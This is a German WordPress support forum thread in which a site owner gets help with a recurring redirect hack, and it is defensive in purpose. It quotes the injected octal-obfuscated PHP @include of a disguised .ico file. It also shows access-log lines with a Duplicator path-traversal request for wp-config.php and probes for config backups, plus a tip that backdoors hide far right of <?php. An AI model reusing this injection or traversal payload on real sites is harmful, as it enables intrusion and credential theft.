Support » Allgemeine Fragen » Hack: Redirect wenn die Seite via Google zum ersten Mal aufgerufen wird

  • Gelöst ComMotion

    (@werbeagenturcommotion)


    Hallo zusammen,

    ich habe ein sehr merkwürdiges Phänomen. Bei manchen Seiten beobachte ich einen Hack, bei welcher die index.php, die wp-config.php und die wp-settings.php mit folgendem Code in den ersten Zeilen verändert wird:

    /*1a0f6*/
    
    @include "\057va\162/w\167w/\166ho\163ts\057co\155mo\164io\156.o\156li\156e/\155ei\156pi\154at\145s.\144e/\167p-\143on\164en\164/p\154ug\151ns\057li\166em\145sh\055si\164eo\162ig\151n-\167id\147et\163/.\145c9\06376\0667.\151co";
    
    /*1a0f6*/

    Ich habe schon beobachtet, dass hier eine .ico Datei inkludiert wird, die in Wahrheit jedoch eine Weiterleitung zu einer ominösen Seite beinhaltet. Ich habe die .ico Dateien schon mehrfach gelöscht und die index.php, die wp-config.php und die wp-settings.php wiederhergestellt. Doch nach 1-2 Tagen wurde die Seite erneut gehackt und die Bereinigung geht von vorne los. Folgende Dinge habe ich bereits unternommen, um diesem Problem entgegenzuwirken. Doch bislang alles ohne Erfolg:

    • chmod so verändert, dass die Dateien nicht mehr bearbeitet werden können
    • Plugin Stealth Login Page
    • Passwörter der Benutzer verändert (alle!)
    • Passwärter von FTP und Datenbank verändert
    • Der Support vom Hoster hatte auch keine Idee mehr

    Ihr seid meine letzte Hoffnung. Habt ihr eine Idee, wie es dem Angreifer gelingt ständig die Dateien zu manipulieren? Habt ihr Ideen wie ich das unterbinden kann?

    Ich freue mich über jeglichen Hinweis und jede Hilfe.

    Liebe Grüße,
    Maxim

    • Dieses Thema wurde geändert vor 1 Jahr, 4 Monaten von ComMotion.

    Die Seite, für die ich Hilfe brauche: [Anmelden, um den Link zu sehen]

Ansicht von 8 Antworten - 1 bis 8 (von insgesamt 8)
  • Wahrscheinlich hat sich der Angreifer eine Backdoor eingebaut, über die er dann nach einer Änderung der Zugangsdaten problemlos weiter Zugriff auf den Server hat und Malware infiltrieren kann.

    Die Schritte zur Säuberung einer gehackten WordPress-Installation haben wir hier schon oft besprochen. Wenn du nicht lange suchen möchtest, findest du (m)eine Anleitung dazu hier: https://pixolin.de/arbeitsschritte-reparatur-gehackte-website/

    Mögliche Backdoor Aufufe kannst du aus den Access Logs herauslesen. Dafür habe ich ein Analyse Tool auf meiner Seite, mit dem man einen guten Überblick bekommt.

    Laufen noch weitere Seiten auf dem Webspace?
    Das könnte auch das Problem sein – dass die Schadcodes aus einer anderen gehackten Installation „überschwappen“.

    Bzgl. Security empfehle ich die NinjaFirewall.
    Ganz wichtig ist der „Full WAF Mode“. Den kannst du im NinjaFirewall Dashboard aktivieren.

    Durch den Schutz
    „Block direct access to any PHP file located in one of these directories“
    kannst du Backdoors (die es in erster Linie natürlich gar nicht geben sollte!)
    den Gar aus machen.

    Aufrufe wie (fiktiv)
    https://example.org/wp-content/themes/twentytwenty/backdoor.php
    ..liefern dann 403 – forbidden.

    Der Schutz ist wie erwähnt nur im Full Mode verfügbar (sprich wenn die Firewall per .user.ini bzw php.ini vorgesetzt ist – jeder Aufruf da durch muss).

    Gruß

    Pascal

    Thread-Ersteller ComMotion

    (@werbeagenturcommotion)

    Danke ihr beiden. Die Firewall nehme ich, falls ich die Backdoor nicht finden sollte. Die suche ich jetzt aber zuerst.

    Ich habe eine Seite von dem Server auf einen anderen Server umgezogen und dabei nicht nur eine frische WordPress Installation verwendet sondern auch alle Plugins und Themes neu installiert und bin darüber hinaus mit einer ähnlichen Anleitung wie die von @pixolin vorgegangen. Ich habe hierbei einiges bereinigt bekommen und habe am Ende nochmal mit dem Security Plugin Wordfence alles überprüft. Dennoch wird die Seite gehackt.

    @kitepascal Das Analyse Tool sieht interessant aus. Folgende Ergebnisse (Auszug):

    Bedrohliche GET Requests
    [14/Mar/2020:07:37:57 +0100] /?action=duplicator_download&file=../wp-config.php 301
    [14/Mar/2020:07:37:59 +0100] /?action=duplicator_download&file=..%2Fwp-config.php 200
    [15/Mar/2020:11:24:46 +0100] /wp-config.php?aam-media=1 200
    [14/Mar/2020:01:44:33 +0100] /?action=duplicator_download&file=../wp-config.php 301
    [14/Mar/2020:01:44:43 +0100] /?action=duplicator_download&file=..%2Fwp-config.php 200
    [15/Mar/2020:20:50:06 +0100] /wp-config.php?aam-media=1 200
    [12/Mar/2020:03:49:51 +0100] /wp-config.php~ 301
    [12/Mar/2020:03:50:52 +0100] /wp-config.php.save 301
    [12/Mar/2020:03:51:30 +0100] /wp-config.php_bak 301
    [12/Mar/2020:03:52:01 +0100] /wp-config.bak 301
    [12/Mar/2020:03:52:30 +0100] /wp-config.php.bak 301
    [12/Mar/2020:03:52:57 +0100] /wp-config.save 301
    [12/Mar/2020:03:53:29 +0100] /wp-config.old 301
    [12/Mar/2020:03:53:55 +0100] /wp-config.php.old 301
    [12/Mar/2020:03:54:18 +0100] /wp-config.php.orig 301
    [12/Mar/2020:03:54:42 +0100] /wp-config.orig 301
    [12/Mar/2020:03:55:06 +0100] /wp-config.php.original 301
    [12/Mar/2020:03:55:29 +0100] /wp-config.original 301
    [15/Mar/2020:19:25:08 +0100] /wp-configs 301
    [15/Mar/2020:19:25:24 +0100] /wp-config.php- 301
    [15/Mar/2020:19:25:37 +0100] /wp-config.php* 301
    [15/Mar/2020:19:25:40 +0100] /wp-config.php+ 301
    [15/Mar/2020:19:25:45 +0100] /wp-config.php.o 301

    Was sagt mir das jetzt?

    • Diese Antwort wurde geändert vor 1 Jahr, 4 Monaten von ComMotion.

    @werbeagenturcommotion
    Schau dir

    2x /wp-content/plugins/js_composer_salient/config/deprecated/shortcode-vc-cta-button.php 200
    2x /wp-content/plugins/js_composer_salient/include/classes/shortcodes/vc-column.php 200

    genauer an.

    Backdoor Code wird gern mal hinter dem öffnenden <?php platziert, weit nach rechts aus dem (im Editor) sichtbaren Bereich hinaus.

    [14/Mar/2020:07:37:59 +0100] /?action=duplicator_download&file=..%2Fwp-config.php 200
    ist ein Versuch über die Duplicator Sicherheitslücke die wp-config auszulesen.

    P.S.: Die hochgeladenen Logs gehören nicht zu der o.g. Seite – andere Domain.

    Thread-Ersteller ComMotion

    (@werbeagenturcommotion)

    Super, danke. Ich habe es gefunden und eliminieren können. Ich hoffe damit bleibt die Website nun sicher. Ich ändere nochmal alle Passwörter und berichte euch in ein paar Tagen nochmal über den aktuellen Stand.

    Ein fettes Dankeschön an euch beiden. Ich hoffe, dass auch andere hiervon profitieren können.

    @werbeagenturcommotion

    Ich habe es gefunden und eliminieren können.

    Was war es denn?

    Thread-Ersteller ComMotion

    (@werbeagenturcommotion)

    Wie du geschrieben hattest:

    @kitepascal

    Backdoor Code wird gern mal hinter dem öffnenden <?php platziert, weit nach rechts aus dem (im Editor) sichtbaren Bereich hinaus.

    Das war der entscheidende Hinweis. Danke dafür!

    Thread-Ersteller ComMotion

    (@werbeagenturcommotion)

    Kurzes Update: Auch nach zwei Tagen ist die Seite noch sicher und wurde nicht gehackt. Danke euch beiden nochmal für eure schnelle Hilfe. Ich hoffe, dass dieser Post auch anderen hilft dasselbe Problem zu lösen.

Ansicht von 8 Antworten - 1 bis 8 (von insgesamt 8)
  • Das Thema „Hack: Redirect wenn die Seite via Google zum ersten Mal aufgerufen wird“ ist für neue Antworten geschlossen.